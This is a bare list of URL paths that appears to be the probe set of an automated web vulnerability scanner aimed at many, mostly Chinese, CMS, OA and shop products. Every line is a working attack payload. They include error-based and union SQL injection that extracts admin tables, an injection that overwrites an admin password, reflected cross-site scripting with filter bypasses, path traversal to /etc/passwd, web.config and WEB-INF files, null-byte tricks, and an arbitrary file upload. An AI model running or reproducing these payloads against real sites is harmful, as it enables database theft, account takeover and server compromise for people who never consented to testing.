/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
